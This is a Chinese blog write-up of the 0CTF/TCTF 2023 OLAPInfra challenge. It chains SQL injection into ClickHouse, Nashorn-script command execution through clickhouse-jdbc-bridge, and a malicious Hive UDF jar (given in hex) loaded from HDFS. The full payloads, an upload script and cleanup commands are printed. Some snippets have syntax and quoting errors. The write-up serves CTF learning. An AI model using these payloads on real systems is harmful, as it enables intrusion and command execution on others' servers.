首页 > 其他分享 >0CTF/TCTF 2023 OLAPInfra Nashorn RCE + HDFS UDF RCE

0CTF/TCTF 2023 OLAPInfra Nashorn RCE + HDFS UDF RCE

时间:2024-07-31 16:26:33浏览次数:14  
标签:HDFS jdbc java 0CTF hive sb ch new RCE

前置知识

ClickHouse:是一个开源的列式数据库管理系统

clickhouse-jdbc-bridge:clickhouse数据库和jdbc交互的工具

HDFS(Hadoop Distributed File System):专为大数据存储和处理而设计。

审计

<?php
error_reporting(E_ALL ^ E_DEPRECATED);
require __DIR__ . '/../vendor/autoload.php';
if (!isset($_GET['query'])) {
  show_source(__FILE__);
  exit;
}
$config = [
  'host' => 'clickhouse',
  'port' => '8123',
  'username' => 'default',
  'password' => ''
];
$db = new ClickHouseDB\Client($config);
$db->database('default');
$db->setTimeout(1.5);
$db->setTimeout(10);
$db->setConnectTimeOut(5);
$db->ping(true);
$statement = $db->select('SELECT * FROM u_data WHERE ' . $_GET['query'] . ' LIMIT 10');
echo (json_encode($statement->rows()));

// Err 'Uncaught ClickHouseDB\Exception\DatabaseException: connect to hive metastore: thrift' or
// Err 'NoSuchObjectException(message=hive.default.u_data table not found)',
// please wait for >= 1min, hive is not initialized.

这是一个提供数据库查询的php代码,不过里面泄露了clickhouse 数据库管理系统的配置信息,并且第20处存在sql注入

根据官方文档:https://github.com/ClickHouse/clickhouse-jdbc-bridge/blob/v2.1.0/README.md#usage

其中的clickhouse-jdbc-bridge允许执行sql语句,脚本文件,以及js代码等等

-- adhoc query
select * from jdbc('ch-server', 'system', 'select * from query_log where user != ''default''')
select * from jdbc('ch-server', 'select * from query_log where user != ''default''')
select * from jdbc('ch-server', 'select * from system.query_log where user != ''default''')

-- table query
select * from jdbc('ch-server', 'system', 'query_log')
select * from jdbc('ch-server', 'query_log')

-- saved query
select * from jdbc('ch-server', 'scripts/show-query-logs.sql')

-- named query
select * from jdbc('ch-server', 'show-query-logs')

-- scripting
select * from jdbc('script', '[1,2,3]')
select * from jdbc('script', 'js', '[1,2,3]')
select * from jdbc('script', 'scripts/one-two-three.js')

其中在 Java 8 开始引入的 JavaScript 引擎Nashorn。Nashorn支持在Java应用中处理脚本,可以用JavaScript语法来编写代码。

所以我们可以利用Java中的Runtime类来执行系统命令。

构造sql注入语句,执行rce

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script:', 'java.lang.Runtime.getRuntime().exec("ls")')

构造js代码回显数据

#创建ProcessBuilder 实例,用于执行系统命令
var a = new java.lang.ProcessBuilder("/readflag");

#获取启动的进程
b = a.start();

#获取标准输出流
c = b.getInputStream();

#构建StringBuilder实例,用于回显字符串
sb = new java.lang.StringBuilder();

#循环遍历输入流,并将结果添加到实例sb中
d = 0;
while ((d = c.read()) != -1) {
    sb.append(String.fromCharCode(d));
}

#关闭输入流,释放资源
c.close();

# 打印输出
sb.toString();

然后构造sql语句回显数据

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/readflag"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

这里我们就拿到的第一段flag。

第二个部分的flag在hive的机器里,根据hive的官方文档https://cwiki.apache.org/confluence/display/Hive/LanguageManual+DDL#LanguageManualDDL-CreateFunction


CREATE FUNCTION [db_name.]function_name AS class_name
  [USING JAR|FILE|ARCHIVE 'file_uri' [, JAR|FILE|ARCHIVE 'file_uri'] ];

允许通过上传文件的方式构造用户自定义函数

我们开始编写自定义函数进行rce,打包为jar包

package udf;
import org.apache.hadoop.hive.ql.exec.UDF;
import org.apache.hadoop.io.Text;
import java.io.*;
import java.lang.*;
 
public final class Exec extends UDF {
  public Text evaluate(final Text s) {
    if (s == null) { return null; }
    try 
    {
        String result = "";
        String command = s.toString();
        Process p = Runtime.getRuntime().exec(command);
        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String inputLine;
        while ((inputLine = in.readLine()) != null) {
            result += inputLine + "\n";
        }
        in.close();
        return new Text(result);
    } catch (IOException e) {
        return new Text(e.toString());
    }
 
  }
}

将构造好的jar包进行16进制转储

504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000

我们可以利用ClickHouse数据库操作HDFS,这里我们通过连接到clickhouse数据库执行sql命令,上传jar包,jar包的存放路径为HDFS根目录下的a.jar

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('jdbc:clickhouse://127.0.0.1:8123', 'CREATE TABLE hdfs_test (name String) ENGINE=HDFS(\'hdfs://namenode:8020/a.jar\', \'Native\');')

然后将数据上传至hdfs:///a.jar\

jdbc('jdbc:clickhouse://127.0.0.1:8123', 'INSERT INTO hdfs_test SETTINGS hdfs_create_new_file_on_insert=TRUE VALUES (unhex(\504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000\'))')

但是由于click house不支持Thrift协议,所以出题人利用 Golang+UPX 编写了一个简易的hive客户端,然后我们可以编写分时上传客户端程序,并进行拼接

package main
 
import (
	"context"
	"github.com/beltran/gohive"
	"log"
	"os"
)
 
func main() {
	conf := gohive.NewConnectConfiguration()
	conf.Username = "root" // username maybe empty
	connection, errConn := gohive.Connect("hive", 10000, "NONE", conf)
	if errConn != nil {
		log.Fatalln(errConn)
	}
	defer connection.Close()
	cursor := connection.Cursor()
	ctx := context.Background()
	cursor.Exec(ctx, os.Args[1])
	if cursor.Err != nil {
		log.Fatalln(cursor.Err)
	}
	defer cursor.Close()
	var s string
	for cursor.HasMore(ctx) {
		cursor.FetchOne(ctx, &s)
		if cursor.Err != nil {
			log.Fatalln(cursor.Err)
		}
		log.Println(s)
	}
}
 
#!/bin/bash
# build in golang:1.21.3-bullseye
go build -a -gcflags=all="-l -B -wb=false" -ldflags "-s -w"
upx --brute --best clickhouse-to-hive
 

python分时上传脚本

import requests

def query(s):
  a = requests.get('https://ip:port', params={
    "query": "1=0 union all select results, '2', '3', '4' from " + s
  })
  text = a.text
  try:
    return json.loads(text)[0]['userid']
  except:
    return a.text
    
def rce_in_clickhouse(c):
  sql = "jdbc('script:', 'var a=new java.lang.ProcessBuilder(\"bash\",\"-c\",\"{{echo,{}}}|{{base64,-d}}|{{bash,-i}}\"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){{sb.append(String.fromCharCode(d))}};c.close();sb.toString()')".format(base64.b64encode(c.encode('utf-8')).decode('utf-8'))
  return query(sql)

def upload():
  ch_to_hive = open('./clickhouse-to-hive/clickhouse-to-hive', 'rb').read()
  ch_to_hive_parts = [ch_to_hive[i:i+4096] for i in range(0, len(ch_to_hive), 4096)]
  for i, r in enumerate(ch_to_hive_parts):
    # Cannot direct append because script will be executed twice
    s = base64.b64encode(r).decode('ascii')
    sql3 = "jdbc('script:', 'var fos=Java.type(\"java.io.FileOutputStream\");var f=new fos(\"/tmp/ttt{}\");f.write(java.util.Base64.decoder.decode(\"{}\"));f.close();1')".format(str(i), s)
    query(sql3)
  sql4 = "jdbc('script:', 'var File=Java.type(\"java.io.File\");var fos=Java.type(\"java.io.FileOutputStream\");var fis=Java.type(\"java.io.FileInputStream\");var f=new fos(\"/tmp/ch-to-hive\");for(var i=0;i<{};i++){{var ff=new File(\"/tmp/ttt\"+i.toString());var a=new Array(ff.length()+1).join(\"1\").getBytes();var fi=new fis(ff);fi.read(a);fi.close();f.write(a);}}f.close();')".format(str(len(ch_to_hive_parts)))
  query(sql4)
  rce_in_clickhouse('chmod +x /tmp/ch-to-hive && rm -rf /tmp/ttt*'
	
upload()

最后通过此hive客户端加载自定义函数

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/tmp/ch-to-hive "create function default.v as udf.Exec using jar 'hdfs:///a.jar'""),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

读取/readflag数据

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("/tmp/ch-to-hive "SELECT default.v('/readflag')""),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

最后擦屁股,删除上传的文件

1=0 UNION ALL SELECT results, '', '', '' FROM jdbc('script', 'var a=new java.lang.ProcessBuilder("rm -rf /tmp/ch-to-hive"),b=a.start(),c=b.getInputStream(),sb=new java.lang.StringBuilder(),d=0;while ((d=c.read())!=-1){sb.append(String.fromCharCode(d))};c.close();sb.toString()')

标签:HDFS,jdbc,java,0CTF,hive,sb,ch,new,RCE
From: https://blog.csdn.net/m0_68483928/article/details/140826098

相关文章

  • [React] Force React to update it's DOM by using flushSync
    Refertohttps://react.dev/reference/react-dom/flushSync Forexample,thebrowseronbeforeprintAPIallowsyoutochangethepageimmediatelybeforetheprintdialogopens.Thisisusefulforapplyingcustomprintstylesthatallowthedocumenttodispl......
  • phpstudy_2016-2018_rce_backdoor漏洞复现
    phpstudy_2016-2018_rce_backdoor说明内容漏洞编号phpstudy_2016-2018_rce漏洞名称RCE(RemoteCommand|CodeExecute)漏洞评级高危影响范围phpStudy2016、phpStudy2018漏洞描述攻击者可以利用该漏洞执行PHP命令,也可以称作phpStudy后门。漏洞描述攻击者可以利用该漏......
  • Educational Codeforces Round 168 (Rated for Div. 2) 补题记录(A~E)
    A直接暴力枚举字符添加在哪里,以及添加的字符是什么即可。#include<bits/stdc++.h>#defineintlonglongusingnamespacestd;constintN=500100;signedmain(){intT;cin>>T;while(T--){strings;cin>>s;stringans;i......
  • HDFS集群
    一、上传hadoop安装包到hdp-01集群任一节点(master) tar-zxvf软件包-C指定安装文件夹二、修改配置文件1.指定Hadoop的默认文件系统为hdfs2.指定hdfs的namenode节点为哪台机器3.指定namenode软件存储元数据的本地目录4.指定datanode软件存放文件块的本地目录三、进入......
  • debezium source端同步海量数据库数据vastbase到kafka
    debeziumsource端同步海量数据库数据vastbase到kafkaOriginal 韦家富 心流时刻  2024年01月30日15:17 北京本文用于debeziumsource端同步海量vastbase数据库的数据到kafka,sink端同理。 1、基础环境安装 1、kafka2、zookeeper3、海量数据库vastbase 自行......
  • Codeforces Round 933 (Div. 3) D 题
    D.RudolfandtheBallGame原题链接:https://codeforces.com/contest/1941/problem/D RudolfandBernarddecidedtoplayagamewiththeirfriends. n peoplestandinacircleandstartthrowingaballtoeachother.Theyarenumberedfrom 1 to nn i......
  • 一个基于 SourceGenerator 生成 从 dbReader转换为 class 数据的性能测试实验
    好奇SourceGenerator出现开始,好几年了,虽然一直好奇用SourceGenerator生成代码与emit等动态生成的代码会有多少差距,但是一直特别懒,不想搞其实dapperaot项目做了类似事情,不过功能特别积极,还引用了实验特性,所以还是想更为简单客观对比本次乘着自己暂时性不懒了,做了一个基......
  • Codeforces Round 929 (Div. 3)---->E. Turtle vs. Rabbit Race: Optimal Trainings
    https://codeforces.com/contest/1933/problem/E#include<bits/stdc++.h>#definexfirst#defineysecondusingnamespacestd;typedeflonglongll;typedef__int128i128;typedefpair<int,int>pii;constintN=2e5+10,M=110;intn,q;inta[N];ll......
  • 强化学习Reinforcement Learning算法的样本效率提升策略
    强化学习ReinforcementLearning算法的样本效率提升策略1.背景介绍1.1问题的由来在强化学习领域,提升算法的样本效率是关键挑战之一。在许多现实世界的应用场景中,比如机器人自主导航、智能游戏、自动驾驶、医疗健康决策以及大规模服务系统优化,获取高价值的环境反馈往往......
  • Codeforces Round 958 (Div. 2)A(AC)BC(补题)
    这里写目录标题A思维题【AC】B贪心(+双指针)【补题】冗余代码(我的):大佬:双指针代码借鉴后代码C异或问题【补题】A思维题【AC】思路:每次分成k-1个1,1个其他#include<iostream>#include<cstring>#include<algorithm>usingnamespacestd;//constintN=2e5+10;v......